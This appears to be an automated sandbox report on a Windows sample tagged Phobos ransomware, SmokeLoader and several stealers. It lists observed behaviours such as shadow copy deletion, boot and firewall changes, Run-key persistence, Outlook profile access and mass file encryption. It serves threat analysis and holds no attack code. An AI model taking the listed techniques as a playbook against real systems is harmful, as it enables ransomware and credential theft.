Malware Analysis Report

2024-10-16 05:11

Sample ID 230923-zmn2msad3y
Target 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636
SHA256 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636
Tags
ammyyadmin flawedammyy phemedrone phobos rhadamanthys smokeloader backdoor collection evasion persistence ransomware rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636

Threat Level: Known bad

The file 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636 was found to be: Known bad.

Malicious Activity Summary

ammyyadmin flawedammyy phemedrone phobos rhadamanthys smokeloader backdoor collection evasion persistence ransomware rat spyware stealer trojan

AmmyyAdmin payload

Rhadamanthys

Ammyy Admin

SmokeLoader

Detect rhadamanthys stealer shellcode

Phobos

FlawedAmmyy RAT

Phemedrone

Suspicious use of NtCreateUserProcessOtherParentProcess

Deletes shadow copies

Modifies boot configuration data using bcdedit

Renames multiple (251) files with added filename extension

Downloads MZ/PE file

Modifies Windows Firewall

Deletes backup catalog

Reads user/profile data of web browsers

Executes dropped EXE

Drops startup file

Checks computer location settings

Accesses Microsoft Outlook profiles

Adds Run key to start application

Looks up external IP address via web service

Drops desktop.ini file(s)

Suspicious use of SetThreadContext

Drops file in Program Files directory

Program crash

Unsigned PE

Enumerates physical storage devices

outlook_win_path

Suspicious use of WriteProcessMemory

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

outlook_office_path

Uses Task Scheduler COM API

Uses Volume Shadow Copy service COM API

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-09-23 20:50

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-09-23 20:50

Reported

2023-09-23 20:52

Platform

win10v2004-20230915-en

Max time kernel

78s

Max time network

131s

Command Line

C:\Windows\Explorer.EXE

Signatures

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect rhadamanthys stealer shellcode

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

FlawedAmmyy RAT

trojan flawedammyy

Phemedrone

stealer phemedrone

Phobos

ransomware phobos

Rhadamanthys

stealer rhadamanthys

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4256 created 3196 N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe C:\Windows\Explorer.EXE

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (251) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\781D.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\75DA.exe N/A

Drops startup file

Description Indicator Process Target
File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\n6)ZqKc3{ = "C:\\Users\\Admin\\AppData\\Local\\n6)ZqKc3{.exe" C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\n6)ZqKc3{ = "C:\\Users\\Admin\\AppData\\Local\\n6)ZqKc3{.exe" C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$Recycle.Bin\S-1-5-21-919254492-3979293997-764407192-1000\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-919254492-3979293997-764407192-1000\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_SubTest-ppd.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_MAK-ul-oob.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-io_zh_CN.jar.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-80.png C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_heb.xml C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller\pkeyconfig.companion.dll C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\it-IT\sqlxmlx.rll.mui C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-100.png.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL115.XML C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.sr-latn-rs.dll.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\MSInfo\it-IT\msinfo32.exe.mui C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Java\jre1.8.0_66\bin\awt.dll.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe.config C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\AirSpace.Etw.man.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\javafx-mx.jar C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_CopyNoDrop32x32.gif.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial2-ppd.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_KMS_Client_AE-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkClientCP.bat.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.docs.zh_CN_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.property_1.4.200.v20140214-0004.jar C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\va.txt C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Retail-ul-oob.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Grace-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\StandardR_Trial-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Fonts\private\CENTURY.TTF.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\si.txt C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\bin\serialver.exe.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-modules_zh_CN.jar.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_zh_CN.jar.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\OSFROAMINGPROXY.DLL C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\msvcp120.dll C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_ja.jar.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_SubTest-ppd.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\plugin2\msvcr100.dll C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_OEM_Perp-ul-oob.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected][4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_ja.jar.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Smokey Glass.eftx.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Trial-ul-oob.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_OEM_Perp-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_Subscription-ul-oob.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_SubTrial-ppd.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Spatial.NetFX35.dll.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\api-ms-win-crt-convert-l1-1-0.dll C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\db\bin\ij.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_zh_CN.jar C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProMSDNR_Retail-pl.xrm-ms C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\linesstylish.dotx.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\api-ms-win-core-timezone-l1-1-0.dll C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Trial-pl.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\vccorlib140.dll C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Client\msvcr120.dll C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\MondoR_O16ConsumerPerp_Bypass30-ppd.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial5-pl.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_ja.jar.id[4FB2A4D5-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Client\api-ms-win-core-file-l1-2-0.dll C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\certreq.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\certreq.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
